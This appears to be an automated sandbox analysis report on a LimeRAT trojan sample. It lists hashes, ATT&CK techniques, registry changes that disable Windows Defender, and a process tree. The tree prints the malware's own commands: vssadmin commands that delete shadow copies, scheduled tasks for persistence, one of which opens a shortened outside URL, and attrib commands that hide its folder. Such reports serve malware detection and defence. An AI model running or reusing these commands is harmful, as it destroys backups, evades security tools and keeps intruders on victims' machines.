limerat | 297dbbb1daca4b23893b034ab20b8afd0de7664705f064dbbc7fd1d217b5fae0

Analysis

max time kernel
64s
max time network
97s
platform
windows10-2004_x64
resource
win10v2004-20220812-en
resource tags

arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
submitted
27-09-2022 18:11

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

HEUR-Trojan.Win32.Generic-297dbbb1daca4b23893b034ab20b8afd0de7664705f064dbbc7fd1d217b5fae0.exe
Size

164KB
MD5

df0b023471306ceb44a253d7cfd86abc
SHA1

36b498e04a1777bbea6582f9d1a0820f96cabe97
SHA256

297dbbb1daca4b23893b034ab20b8afd0de7664705f064dbbc7fd1d217b5fae0
SHA512

2334f5dad874d44b7180241247f959d36b5d58fe8625c2b5013dd6bd751998a5ad9055b3c5255b95cb8a05eda2a06f566ab77bd45a54bd6923588c05b76e956c
SSDEEP

3072:/I/0W2G4b/gFbGbj2koc34mwAEoznq1vK7rbKO5oqoO0MhwNz:/RjG40RGb3X34Hknq1cm20NN

Score

10^/10

limerat evasion persistence ransomware rat trojan

Malware Config

Signatures

Contains code to disable Windows Defender 3 IoCs

A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

resource	yara_rule
behavioral2/memory/2412-132-0x000001B58B170000-0x000001B58B19E000-memory.dmp	disable_win_def
behavioral2/files/0x000400000001db3e-169.dat	disable_win_def
behavioral2/files/0x000400000001db3e-175.dat	disable_win_def

LimeRAT
Simple yet powerful RAT for Windows machines written in .NET.
rat limerat

Modifies WinLogon for persistence 2 TTPs 2 IoCs

persistence

Winlogon Helper DLL

T1004

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\shell = "explorer.exe,\"C:\\Users\\Admin\\AppData\\Roaming\\Help\\explorer.exe\""	HEUR-Trojan.Win32.Generic-297dbbb1daca4b23893b034ab20b8afd0de7664705f064dbbc7fd1d217b5fae0.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\shell = "explorer.exe,\"C:\\Users\\Admin\\AppData\\Roaming\\Help\\explorer.exe\""	explorer.exe

Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs

evasion trojan

Modify Registry

T1112

Modify Existing Service

T1031

Disabling Security Tools

T1089

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	HEUR-Trojan.Win32.Generic-297dbbb1daca4b23893b034ab20b8afd0de7664705f064dbbc7fd1d217b5fae0.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	HEUR-Trojan.Win32.Generic-297dbbb1daca4b23893b034ab20b8afd0de7664705f064dbbc7fd1d217b5fae0.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	HEUR-Trojan.Win32.Generic-297dbbb1daca4b23893b034ab20b8afd0de7664705f064dbbc7fd1d217b5fae0.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	HEUR-Trojan.Win32.Generic-297dbbb1daca4b23893b034ab20b8afd0de7664705f064dbbc7fd1d217b5fae0.exe

Modifies security service 2 TTPs 1 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Start = "4"	HEUR-Trojan.Win32.Generic-297dbbb1daca4b23893b034ab20b8afd0de7664705f064dbbc7fd1d217b5fae0.exe

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Executes dropped EXE 1 IoCs

pid	Process
4128	explorer.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	HEUR-Trojan.Win32.Generic-297dbbb1daca4b23893b034ab20b8afd0de7664705f064dbbc7fd1d217b5fae0.exe

Enumerates connected drives 3 TTPs 17 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\H:	vssadmin.exe
File opened (read-only)	\??\e:	vssadmin.exe
File opened (read-only)	\??\E:	vssadmin.exe
File opened (read-only)	\??\H:	vssadmin.exe
File opened (read-only)	\??\g:	vssadmin.exe
File opened (read-only)	\??\e:	vssadmin.exe
File opened (read-only)	\??\D:	vssadmin.exe
File opened (read-only)	\??\h:	vssadmin.exe
File opened (read-only)	\??\F:	vssadmin.exe
File opened (read-only)	\??\h:	vssadmin.exe
File opened (read-only)	\??\G:	vssadmin.exe
File opened (read-only)	\??\G:	vssadmin.exe
File opened (read-only)	\??\E:	vssadmin.exe
File opened (read-only)	\??\f:	vssadmin.exe
File opened (read-only)	\??\F:	vssadmin.exe
File opened (read-only)	\??\f:	vssadmin.exe
File opened (read-only)	\??\g:	vssadmin.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
272	4128	WerFault.exe	141

Creates scheduled task(s) 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
4932	schtasks.exe
4432	schtasks.exe
2896	schtasks.exe

Disables Windows logging functionality 2 TTPs
Changes registry settings to disable Windows Event logging.

Disabling Security Tools
T1089

Modify Registry
T1112

Interacts with shadow copies 2 TTPs 12 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1107

Inhibit System Recovery

T1490

pid	Process
3972	vssadmin.exe
4244	vssadmin.exe
864	vssadmin.exe
1508	vssadmin.exe
1936	vssadmin.exe
2792	vssadmin.exe
1732	vssadmin.exe
1464	vssadmin.exe
3660	vssadmin.exe
2460	vssadmin.exe
1036	vssadmin.exe
1132	vssadmin.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
4540	PING.EXE

Suspicious behavior: EnumeratesProcesses 45 IoCs

pid	Process
2412	HEUR-Trojan.Win32.Generic-297dbbb1daca4b23893b034ab20b8afd0de7664705f064dbbc7fd1d217b5fae0.exe
2412	HEUR-Trojan.Win32.Generic-297dbbb1daca4b23893b034ab20b8afd0de7664705f064dbbc7fd1d217b5fae0.exe
2412	HEUR-Trojan.Win32.Generic-297dbbb1daca4b23893b034ab20b8afd0de7664705f064dbbc7fd1d217b5fae0.exe
4880	powershell.exe
4880	powershell.exe
4128	explorer.exe
4128	explorer.exe
4128	explorer.exe
4128	explorer.exe
4128	explorer.exe
4128	explorer.exe
4128	explorer.exe
4128	explorer.exe
4128	explorer.exe
4128	explorer.exe
4128	explorer.exe
4128	explorer.exe
4128	explorer.exe
4128	explorer.exe
4128	explorer.exe
4128	explorer.exe
4128	explorer.exe
4128	explorer.exe
4128	explorer.exe
4128	explorer.exe
4128	explorer.exe
4128	explorer.exe
4128	explorer.exe
4128	explorer.exe
4128	explorer.exe
4128	explorer.exe
4128	explorer.exe
4128	explorer.exe
4128	explorer.exe
4128	explorer.exe
4128	explorer.exe
4128	explorer.exe
4128	explorer.exe
4128	explorer.exe
4128	explorer.exe
4128	explorer.exe
4128	explorer.exe
4128	explorer.exe
4128	explorer.exe
4128	explorer.exe

Suspicious use of AdjustPrivilegeToken 10 IoCs

description	pid	Process
Token: SeDebugPrivilege	2412	HEUR-Trojan.Win32.Generic-297dbbb1daca4b23893b034ab20b8afd0de7664705f064dbbc7fd1d217b5fae0.exe
Token: SeDebugPrivilege	4880	powershell.exe
Token: SeBackupPrivilege	3016	vssvc.exe
Token: SeRestorePrivilege	3016	vssvc.exe
Token: SeAuditPrivilege	3016	vssvc.exe
Token: SeBackupPrivilege	2412	HEUR-Trojan.Win32.Generic-297dbbb1daca4b23893b034ab20b8afd0de7664705f064dbbc7fd1d217b5fae0.exe
Token: SeSecurityPrivilege	2412	HEUR-Trojan.Win32.Generic-297dbbb1daca4b23893b034ab20b8afd0de7664705f064dbbc7fd1d217b5fae0.exe
Token: SeBackupPrivilege	2412	HEUR-Trojan.Win32.Generic-297dbbb1daca4b23893b034ab20b8afd0de7664705f064dbbc7fd1d217b5fae0.exe
Token: SeDebugPrivilege	4128	explorer.exe
Token: SeDebugPrivilege	4128	explorer.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2412 wrote to memory of 4932	2412	HEUR-Trojan.Win32.Generic-297dbbb1daca4b23893b034ab20b8afd0de7664705f064dbbc7fd1d217b5fae0.exe	82
PID 2412 wrote to memory of 4932	2412	HEUR-Trojan.Win32.Generic-297dbbb1daca4b23893b034ab20b8afd0de7664705f064dbbc7fd1d217b5fae0.exe	82
PID 2412 wrote to memory of 4880	2412	HEUR-Trojan.Win32.Generic-297dbbb1daca4b23893b034ab20b8afd0de7664705f064dbbc7fd1d217b5fae0.exe	87
PID 2412 wrote to memory of 4880	2412	HEUR-Trojan.Win32.Generic-297dbbb1daca4b23893b034ab20b8afd0de7664705f064dbbc7fd1d217b5fae0.exe	87
PID 2412 wrote to memory of 3932	2412	HEUR-Trojan.Win32.Generic-297dbbb1daca4b23893b034ab20b8afd0de7664705f064dbbc7fd1d217b5fae0.exe	89
PID 2412 wrote to memory of 3932	2412	HEUR-Trojan.Win32.Generic-297dbbb1daca4b23893b034ab20b8afd0de7664705f064dbbc7fd1d217b5fae0.exe	89
PID 2412 wrote to memory of 2452	2412	HEUR-Trojan.Win32.Generic-297dbbb1daca4b23893b034ab20b8afd0de7664705f064dbbc7fd1d217b5fae0.exe	92
PID 2412 wrote to memory of 2452	2412	HEUR-Trojan.Win32.Generic-297dbbb1daca4b23893b034ab20b8afd0de7664705f064dbbc7fd1d217b5fae0.exe	92
PID 2412 wrote to memory of 4852	2412	HEUR-Trojan.Win32.Generic-297dbbb1daca4b23893b034ab20b8afd0de7664705f064dbbc7fd1d217b5fae0.exe	91
PID 2412 wrote to memory of 4852	2412	HEUR-Trojan.Win32.Generic-297dbbb1daca4b23893b034ab20b8afd0de7664705f064dbbc7fd1d217b5fae0.exe	91
PID 2412 wrote to memory of 980	2412	HEUR-Trojan.Win32.Generic-297dbbb1daca4b23893b034ab20b8afd0de7664705f064dbbc7fd1d217b5fae0.exe	93
PID 2412 wrote to memory of 980	2412	HEUR-Trojan.Win32.Generic-297dbbb1daca4b23893b034ab20b8afd0de7664705f064dbbc7fd1d217b5fae0.exe	93
PID 2412 wrote to memory of 4588	2412	HEUR-Trojan.Win32.Generic-297dbbb1daca4b23893b034ab20b8afd0de7664705f064dbbc7fd1d217b5fae0.exe	94
PID 2412 wrote to memory of 4588	2412	HEUR-Trojan.Win32.Generic-297dbbb1daca4b23893b034ab20b8afd0de7664705f064dbbc7fd1d217b5fae0.exe	94
PID 2412 wrote to memory of 4500	2412	HEUR-Trojan.Win32.Generic-297dbbb1daca4b23893b034ab20b8afd0de7664705f064dbbc7fd1d217b5fae0.exe	95
PID 2412 wrote to memory of 4500	2412	HEUR-Trojan.Win32.Generic-297dbbb1daca4b23893b034ab20b8afd0de7664705f064dbbc7fd1d217b5fae0.exe	95
PID 2412 wrote to memory of 2556	2412	HEUR-Trojan.Win32.Generic-297dbbb1daca4b23893b034ab20b8afd0de7664705f064dbbc7fd1d217b5fae0.exe	114
PID 2412 wrote to memory of 2556	2412	HEUR-Trojan.Win32.Generic-297dbbb1daca4b23893b034ab20b8afd0de7664705f064dbbc7fd1d217b5fae0.exe	114
PID 2412 wrote to memory of 2112	2412	HEUR-Trojan.Win32.Generic-297dbbb1daca4b23893b034ab20b8afd0de7664705f064dbbc7fd1d217b5fae0.exe	100
PID 2412 wrote to memory of 2112	2412	HEUR-Trojan.Win32.Generic-297dbbb1daca4b23893b034ab20b8afd0de7664705f064dbbc7fd1d217b5fae0.exe	100
PID 2412 wrote to memory of 3068	2412	HEUR-Trojan.Win32.Generic-297dbbb1daca4b23893b034ab20b8afd0de7664705f064dbbc7fd1d217b5fae0.exe	101
PID 2412 wrote to memory of 3068	2412	HEUR-Trojan.Win32.Generic-297dbbb1daca4b23893b034ab20b8afd0de7664705f064dbbc7fd1d217b5fae0.exe	101
PID 2412 wrote to memory of 1304	2412	HEUR-Trojan.Win32.Generic-297dbbb1daca4b23893b034ab20b8afd0de7664705f064dbbc7fd1d217b5fae0.exe	111
PID 2412 wrote to memory of 1304	2412	HEUR-Trojan.Win32.Generic-297dbbb1daca4b23893b034ab20b8afd0de7664705f064dbbc7fd1d217b5fae0.exe	111
PID 2412 wrote to memory of 1932	2412	HEUR-Trojan.Win32.Generic-297dbbb1daca4b23893b034ab20b8afd0de7664705f064dbbc7fd1d217b5fae0.exe	104
PID 2412 wrote to memory of 1932	2412	HEUR-Trojan.Win32.Generic-297dbbb1daca4b23893b034ab20b8afd0de7664705f064dbbc7fd1d217b5fae0.exe	104
PID 2412 wrote to memory of 2248	2412	HEUR-Trojan.Win32.Generic-297dbbb1daca4b23893b034ab20b8afd0de7664705f064dbbc7fd1d217b5fae0.exe	105
PID 2412 wrote to memory of 2248	2412	HEUR-Trojan.Win32.Generic-297dbbb1daca4b23893b034ab20b8afd0de7664705f064dbbc7fd1d217b5fae0.exe	105
PID 2412 wrote to memory of 5060	2412	HEUR-Trojan.Win32.Generic-297dbbb1daca4b23893b034ab20b8afd0de7664705f064dbbc7fd1d217b5fae0.exe	106
PID 2412 wrote to memory of 5060	2412	HEUR-Trojan.Win32.Generic-297dbbb1daca4b23893b034ab20b8afd0de7664705f064dbbc7fd1d217b5fae0.exe	106
PID 2452 wrote to memory of 4088	2452	cmd.exe	119
PID 2452 wrote to memory of 4088	2452	cmd.exe	119
PID 3932 wrote to memory of 2460	3932	cmd.exe	118
PID 3932 wrote to memory of 2460	3932	cmd.exe	118
PID 4852 wrote to memory of 1464	4852	cmd.exe	115
PID 4852 wrote to memory of 1464	4852	cmd.exe	115
PID 2556 wrote to memory of 3972	2556	cmd.exe	117
PID 2556 wrote to memory of 3972	2556	cmd.exe	117
PID 980 wrote to memory of 3660	980	cmd.exe	116
PID 980 wrote to memory of 3660	980	cmd.exe	116
PID 1304 wrote to memory of 4244	1304	cmd.exe	120
PID 1304 wrote to memory of 4244	1304	cmd.exe	120
PID 4500 wrote to memory of 1036	4500	cmd.exe	121
PID 4500 wrote to memory of 1036	4500	cmd.exe	121
PID 1932 wrote to memory of 1132	1932	cmd.exe	122
PID 1932 wrote to memory of 1132	1932	cmd.exe	122
PID 4588 wrote to memory of 1936	4588	cmd.exe	125
PID 4588 wrote to memory of 1936	4588	cmd.exe	125
PID 2112 wrote to memory of 864	2112	cmd.exe	124
PID 2112 wrote to memory of 864	2112	cmd.exe	124
PID 2248 wrote to memory of 2792	2248	cmd.exe	126
PID 2248 wrote to memory of 2792	2248	cmd.exe	126
PID 5060 wrote to memory of 1508	5060	cmd.exe	127
PID 5060 wrote to memory of 1508	5060	cmd.exe	127
PID 3068 wrote to memory of 1732	3068	cmd.exe	128
PID 3068 wrote to memory of 1732	3068	cmd.exe	128
PID 2412 wrote to memory of 1328	2412	HEUR-Trojan.Win32.Generic-297dbbb1daca4b23893b034ab20b8afd0de7664705f064dbbc7fd1d217b5fae0.exe	130
PID 2412 wrote to memory of 1328	2412	HEUR-Trojan.Win32.Generic-297dbbb1daca4b23893b034ab20b8afd0de7664705f064dbbc7fd1d217b5fae0.exe	130
PID 1328 wrote to memory of 4364	1328	cmd.exe	132
PID 1328 wrote to memory of 4364	1328	cmd.exe	132
PID 1328 wrote to memory of 4916	1328	cmd.exe	133
PID 1328 wrote to memory of 4916	1328	cmd.exe	133
PID 2412 wrote to memory of 3936	2412	HEUR-Trojan.Win32.Generic-297dbbb1daca4b23893b034ab20b8afd0de7664705f064dbbc7fd1d217b5fae0.exe	135
PID 2412 wrote to memory of 3936	2412	HEUR-Trojan.Win32.Generic-297dbbb1daca4b23893b034ab20b8afd0de7664705f064dbbc7fd1d217b5fae0.exe	135

Views/modifies file attributes 1 TTPs 4 IoCs

evasion

Hidden Files and Directories

T1158

pid	Process
4364	attrib.exe
4916	attrib.exe
3688	attrib.exe
1504	attrib.exe

C:\Users\Admin\AppData\Local\Temp\HEUR-Trojan.Win32.Generic-297dbbb1daca4b23893b034ab20b8afd0de7664705f064dbbc7fd1d217b5fae0.exe
"C:\Users\Admin\AppData\Local\Temp\HEUR-Trojan.Win32.Generic-297dbbb1daca4b23893b034ab20b8afd0de7664705f064dbbc7fd1d217b5fae0.exe"
1⤵
- Modifies WinLogon for persistence
- Modifies Windows Defender Real-time Protection settings
- Modifies security service
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2412
- C:\Windows\SYSTEM32\schtasks.exe
  schtasks /create /f /sc MINUTE /mo 26 /RL LIMITED /tn UpdateDMR /tr "'C:\Users\Admin\AppData\Roaming\Help\explorer.exe'"
  2⤵
  - Creates scheduled task(s)
  PID:4932
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" Get-MpPreference -verbose
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4880
- C:\Windows\SYSTEM32\cmd.exe
  cmd /c vssadmin Delete Shadows /all /quiet
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3932
- - C:\Windows\system32\vssadmin.exe
    vssadmin Delete Shadows /all /quiet
    3⤵
    - Interacts with shadow copies
    PID:2460
- C:\Windows\SYSTEM32\cmd.exe
  cmd /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4852
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
    3⤵
    - Interacts with shadow copies
    PID:1464
- C:\Windows\SYSTEM32\cmd.exe
  cmd /c vssadmin resize shadow /for=c: /on=c: /maxsize=401MB
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2452
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadow /for=c: /on=c: /maxsize=401MB
    3⤵
    PID:4088
- C:\Windows\SYSTEM32\cmd.exe
  cmd /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:980
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:3660
- C:\Windows\SYSTEM32\cmd.exe
  cmd /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4588
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:1936
- C:\Windows\SYSTEM32\cmd.exe
  cmd /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4500
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:1036
- C:\Windows\SYSTEM32\cmd.exe
  cmd /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2112
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:864
- C:\Windows\SYSTEM32\cmd.exe
  cmd /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3068
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:1732
- C:\Windows\SYSTEM32\cmd.exe
  cmd /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1932
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:1132
- C:\Windows\SYSTEM32\cmd.exe
  cmd /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2248
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:2792
- C:\Windows\SYSTEM32\cmd.exe
  cmd /c Vssadmin delete shadowstorage /all /quiet
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:5060
- - C:\Windows\system32\vssadmin.exe
    Vssadmin delete shadowstorage /all /quiet
    3⤵
    - Interacts with shadow copies
    PID:1508
- C:\Windows\SYSTEM32\cmd.exe
  cmd /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1304
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:4244
- C:\Windows\SYSTEM32\cmd.exe
  cmd /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2556
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:3972
- C:\Windows\SYSTEM32\cmd.exe
  cmd /c attrib +H +S +R "C:\Users\Admin\AppData\Roaming\\Help" & attrib +H +S +R "C:\Users\Admin\AppData\Roaming\\Help\*" /S /D
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1328
- - C:\Windows\system32\attrib.exe
    attrib +H +S +R "C:\Users\Admin\AppData\Roaming\\Help"
    3⤵
    - Views/modifies file attributes
    PID:4364
- - C:\Windows\system32\attrib.exe
    attrib +H +S +R "C:\Users\Admin\AppData\Roaming\\Help\*" /S /D
    3⤵
    - Views/modifies file attributes
    PID:4916
- C:\Windows\SYSTEM32\cmd.exe
  cmd /C schtasks /create /f /st "08:16" /sc weekly /mo "13" /d "Tue" /tn "Microsoft-Windows-DiskDiagnosticResolver" /tr "'explorer'http://bit.ly/347IY80"
  2⤵
  PID:3936
- - C:\Windows\system32\schtasks.exe
    schtasks /create /f /st "08:16" /sc weekly /mo "13" /d "Tue" /tn "Microsoft-Windows-DiskDiagnosticResolver" /tr "'explorer'http://bit.ly/347IY80"
    3⤵
    - Creates scheduled task(s)
    PID:4432
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe /c ping 0 -n 2 & del "C:\Users\Admin\AppData\Local\Temp\HEUR-Trojan.Win32.Generic-297dbbb1daca4b23893b034ab20b8afd0de7664705f064dbbc7fd1d217b5fae0.exe"
  2⤵
  PID:3512
- - C:\Windows\system32\PING.EXE
    ping 0 -n 2
    3⤵
    - Runs ping.exe
    PID:4540
- C:\Users\Admin\AppData\Roaming\Help\explorer.exe
  "C:\Users\Admin\AppData\Roaming\Help\explorer.exe"
  2⤵
  - Modifies WinLogon for persistence
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4128
- - C:\Windows\SYSTEM32\schtasks.exe
    schtasks /create /f /sc MINUTE /mo 26 /RL LIMITED /tn UpdateDMR /tr "'C:\Users\Admin\AppData\Roaming\Help\explorer.exe'"
    3⤵
    - Creates scheduled task(s)
    PID:2896
- - C:\Windows\SYSTEM32\cmd.exe
    cmd /c attrib +H +S +R "C:\Users\Admin\AppData\Roaming\\Help" & attrib +H +S +R "C:\Users\Admin\AppData\Roaming\\Help\*" /S /D
    3⤵
    PID:412
  - - C:\Windows\system32\attrib.exe
      attrib +H +S +R "C:\Users\Admin\AppData\Roaming\\Help"
      4⤵
      Views/modifies file attributes
      PID:3688
  - - C:\Windows\system32\attrib.exe
      attrib +H +S +R "C:\Users\Admin\AppData\Roaming\\Help\*" /S /D
      4⤵
      Views/modifies file attributes
      PID:1504
- - C:\Windows\system32\WerFault.exe
    C:\Windows\system32\WerFault.exe -u -p 4128 -s 1828
    3⤵
    - Program crash
    PID:272

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3016

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 436 -p 4128 -ip 4128
1⤵
PID:296

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Hidden Files and Directories

T1158

Modify Existing Service

T1031

Scheduled Task

T1053

Winlogon Helper DLL

T1004

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Disabling Security Tools

T1089

File Deletion

T1107

Hidden Files and Directories

T1158

Modify Registry

T1112

Web Service

T1102

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Help\explorer.exe

Filesize
164KB

MD5
df0b023471306ceb44a253d7cfd86abc

SHA1
36b498e04a1777bbea6582f9d1a0820f96cabe97

SHA256
297dbbb1daca4b23893b034ab20b8afd0de7664705f064dbbc7fd1d217b5fae0

SHA512
2334f5dad874d44b7180241247f959d36b5d58fe8625c2b5013dd6bd751998a5ad9055b3c5255b95cb8a05eda2a06f566ab77bd45a54bd6923588c05b76e956c

Download Submit
C:\Users\Admin\AppData\Roaming\Help\explorer.exe

Filesize
164KB

MD5
df0b023471306ceb44a253d7cfd86abc

SHA1
36b498e04a1777bbea6582f9d1a0820f96cabe97

SHA256
297dbbb1daca4b23893b034ab20b8afd0de7664705f064dbbc7fd1d217b5fae0

SHA512
2334f5dad874d44b7180241247f959d36b5d58fe8625c2b5013dd6bd751998a5ad9055b3c5255b95cb8a05eda2a06f566ab77bd45a54bd6923588c05b76e956c

Download Submit
memory/2412-176-0x00007FF833AC0000-0x00007FF834581000-memory.dmp

Filesize
10.8MB

Download
memory/2412-132-0x000001B58B170000-0x000001B58B19E000-memory.dmp

Filesize
184KB

Download
memory/2412-135-0x00007FF833AC0000-0x00007FF834581000-memory.dmp

Filesize
10.8MB

Download
memory/2412-133-0x00007FF833AC0000-0x00007FF834581000-memory.dmp

Filesize
10.8MB

Download
memory/4128-184-0x0000023C19A30000-0x0000023C19A34000-memory.dmp

Filesize
16KB

Download
memory/4128-187-0x0000023C19A3C000-0x0000023C19A41000-memory.dmp

Filesize
20KB

Download
memory/4128-179-0x00007FF833AC0000-0x00007FF834581000-memory.dmp

Filesize
10.8MB

Download
memory/4128-186-0x0000023C19A37000-0x0000023C19A3C000-memory.dmp

Filesize
20KB

Download
memory/4128-183-0x0000023C191BA000-0x0000023C191BF000-memory.dmp

Filesize
20KB

Download
memory/4128-177-0x00007FF833AC0000-0x00007FF834581000-memory.dmp

Filesize
10.8MB

Download
memory/4128-185-0x0000023C19A34000-0x0000023C19A37000-memory.dmp

Filesize
12KB

Download
memory/4128-188-0x0000023C19A46000-0x0000023C19A4B000-memory.dmp

Filesize
20KB

Download
memory/4880-137-0x00000246FDDE0000-0x00000246FDE02000-memory.dmp

Filesize
136KB

Download
memory/4880-138-0x00007FF833AC0000-0x00007FF834581000-memory.dmp

Filesize
10.8MB

Download
memory/4880-139-0x00007FF833AC0000-0x00007FF834581000-memory.dmp

Filesize
10.8MB

Download